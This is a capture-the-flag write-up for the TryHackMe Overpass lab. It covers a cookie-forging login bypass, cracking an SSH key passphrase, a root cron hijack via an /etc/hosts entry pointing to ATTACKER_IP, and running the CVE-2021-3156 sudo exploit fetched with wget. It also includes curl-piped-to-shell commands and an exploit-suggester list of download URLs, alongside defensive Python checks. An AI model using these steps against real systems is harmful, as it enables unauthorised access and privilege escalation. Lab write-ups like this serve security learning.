
TryHackMe Overpass writeup (zh-TW)


Challenge information

Services discovered:

  • Port 22: SSH
  • Port 80: HTTP

Step 2: Web directory enumeration

└─$ gobuster dir -u http://10.10.x.x -w /usr/share/seclists/Discovery/Web-Content/common.txt

Found the /admin directory.

Step 3: Authentication Bypass

Inspect the JavaScript loaded by the /admin page:

  • login.js has a logic flaw: anything the server returns other than the exact string "Incorrect credentials" is stored as the SessionToken cookie
async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"
    }
}
  • Having any SessionToken cookie at all is enough to get into /admin: the server checks that the cookie exists, not that it refers to a valid session

Exploit:

document.cookie = "SessionToken=anything"
// then refresh the page (F5); /admin renders for the forged session
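The bypass works because of what the server does with the cookie, not because of login.js itself. The following is an added example, not code from the Overpass box or from this writeup: the vulnerable check is my assumption about why any value is accepted (the writeup only shows that it is), written next to a hardened check that requires the token to match a session the server actually issued. The session store, the `create_session` helper and the user name are constructed for the example.

```python
"""Server-side model of the /admin bypass (added example, not the box's code)."""
import secrets
from typing import Dict, Optional

# Constructed session store: token -> username. This is what /api/login
# should populate only when a password actually matched.
SESSIONS: Dict[str, str] = {}


def create_session(username: str) -> str:
    """Issue a random token and remember it server-side."""
    token = secrets.token_hex(16)
    SESSIONS[token] = username
    return token


def parse_cookies(header: str) -> Dict[str, str]:
    """Minimal Cookie header parser: 'a=1; b=2' -> {'a': '1', 'b': '2'}."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def admin_allowed_vulnerable(cookie_header: str) -> bool:
    """The flaw (assumed): /admin only asks whether a SessionToken cookie exists.

    document.cookie = "SessionToken=anything" satisfies this check.
    """
    return "SessionToken" in parse_cookies(cookie_header)


def admin_allowed_fixed(cookie_header: str) -> Optional[str]:
    """Hardened: the token must map to a session the server created.

    Returns the logged-in username, or None to send the client back to the
    login form. Only tokens minted by create_session() pass; a forged value
    is just a key that is not in the store.
    """
    token = parse_cookies(cookie_header).get("SessionToken")
    if not token:
        return None
    return SESSIONS.get(token)


if __name__ == "__main__":
    forged = "SessionToken=anything"
    print("vulnerable check, forged cookie:", admin_allowed_vulnerable(forged))  # True
    print("fixed check, forged cookie:     ", admin_allowed_fixed(forged))       # None
    real = "SessionToken=" + create_session("james")
    print("fixed check, real session:      ", admin_allowed_fixed(real))         # james
```

The client-side string comparison in login.js is a symptom: even a client that handled the response perfectly would not help, because the /admin handler never asks whether the cookie value means anything.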

Step 4: Cracking the SSH key

The /admin page now shows an encrypted SSH private key. Save it as id_rsa and crack the passphrase:

ssh2john id_rsa > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Passphrase: james13

Step 5: User flag

When connecting, SSH prompts for the key passphrase; enter the one cracked above (the key file must be mode 600, or ssh refuses to use it):

ssh -i id_rsa james@10.10.x.x
cat user.txt

Step 6: Privilege escalation, method 1 (cron job)

A cron job in /etc/crontab runs, as root and every minute, a script fetched over plain HTTP and piped straight into bash:

cat /etc/crontab
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

/etc/hosts is writable by our user, so overpass.thm can be pointed at the attacker's machine:

echo "ATTACKER_IP overpass.thm" >> /etc/hosts

Host a malicious buildscript.sh at /downloads/src/ on the attacker's web server and wait for the root shell. Other writeups cover this method in detail; the reason I did not use it is explained in the lessons-learned notes at the bottom.

Step 6: Privilege escalation, method 2 (CVE-2021-3156)

# check the sudo version
sudo --version

# download and build the exploit (served from the attacker's machine)
wget http://ATTACKER_IP:8000/CVE-2021-3156.tar.gz
tar -xf CVE-2021-3156.tar.gz
cd CVE-2021-3156-main
make
./sudo-hax-me-a-sandwich 0   # the number selects one of the PoC's built-in target profiles (distro, sudo and libc build)
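`sudo --version` alone is not a reliable verdict: distributions backport the fix without changing the version string (a patched Ubuntu 18.04 sudo still reports 1.8.21p2), which is also why linpeas rates the finding only as "probable". The check below is an added example, not code from the writeup or from the exploit. It parses the version output against the affected ranges from the Qualys advisory (legacy 1.8.2 through 1.8.31p2, stable 1.9.0 through 1.9.5p1) and then interprets the advisory's behavioural test, `sudoedit -s /` run as an unprivileged user, which distinguishes patched from unpatched builds regardless of version string. Only `probe_local_sudo` touches the real system; everything else works on strings.

```python
"""Is this sudo in the CVE-2021-3156 (Baron Samedit) range? Added example."""
import re
import subprocess
from typing import Tuple

Version = Tuple[int, int, int, int]

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

# Inclusive (low, high) pairs from the Qualys advisory; patch level pN is the fourth component.
AFFECTED = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
]


def parse_version(sudo_version_output: str) -> Version:
    """'Sudo version 1.8.21p2' -> (1, 8, 21, 2). A missing pN counts as p0."""
    m = VERSION_RE.search(sudo_version_output)
    if not m:
        raise ValueError(f"no sudo version found in {sudo_version_output!r}")
    major, minor, patch, p = m.groups()
    return int(major), int(minor), int(patch), int(p) if p else 0


def version_in_affected_range(sudo_version_output: str) -> bool:
    """Version-string check, the same basis as linpeas' 'probable' rating.

    Distros backport fixes without bumping this string, so a hit here is a
    candidate, not a proof.
    """
    v = parse_version(sudo_version_output)
    return any(low <= v <= high for low, high in AFFECTED)


def sudoedit_probe_says_vulnerable(probe_output: str) -> bool:
    """Interpret the output of `sudoedit -s /` run as an unprivileged user.

    An unpatched sudo gets past argument handling and complains that '/' is
    not a regular file; a patched sudo rejects -s for sudoedit and prints
    its usage text instead.
    """
    return "not a regular file" in probe_output


def probe_local_sudo() -> bool:
    """Run both checks on this machine (needs sudo and sudoedit on PATH)."""
    version = subprocess.run(["sudo", "--version"], capture_output=True, text=True).stdout
    probe = subprocess.run(["sudoedit", "-s", "/"], capture_output=True, text=True)
    return version_in_affected_range(version) and sudoedit_probe_says_vulnerable(
        probe.stderr + probe.stdout
    )


if __name__ == "__main__":
    print("likely vulnerable to CVE-2021-3156:", probe_local_sudo())
```

Run it on the target before downloading anything: if the version is in range but the probe prints usage text, the distro has patched it and building the exploit is wasted time.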

Step 7: Root flag

whoami  # root
cat /root/root.txt

Technical notes

Vulnerability summary

  1. Authentication bypass
    • Login logic lives on the client side
    • The server accepts any SessionToken cookie without validating it
  2. Cron job misconfiguration
    • The script is fetched by hostname rather than by IP, over plain HTTP, and piped straight into bash as root
    • /etc/hosts is writable by unprivileged users
  3. CVE-2021-3156 (Baron Samedit)
    • Heap-based buffer overflow in sudo

Lessons learned

On how CVE-2021-3156 was found:

Run linpeas for automated enumeration; it checks the system's sudo version and flags known vulnerabilities (the block below is from the Linux Exploit Suggester it runs):

curl http://10.6.4.21:8000/linpeas.sh | sh

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-4034] PwnKit
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL:
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
[+] [CVE-2017-0358] ntfs-3g-modprobe
   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
   Exposure: less probable
   Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip
   Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.

So we can go with method 2 (CVE-2021-3156), which the scan flagged.

About Step 6

Two privilege-escalation methods are given here. The first one did not work for me, because I run Kali Linux under WSL, whose networking is restricted, so I could not catch a reverse shell from WSL Kali. The usual workaround is to catch the reverse shell with the netcat available from Windows PowerShell, but the awkward part of this box's privesc is that it fetches a specific file at a specific path, /downloads/src/buildscript.sh, and creating that specific file at that specific path on Windows is a hassle, so I went with the second privilege-escalation method instead.

Done!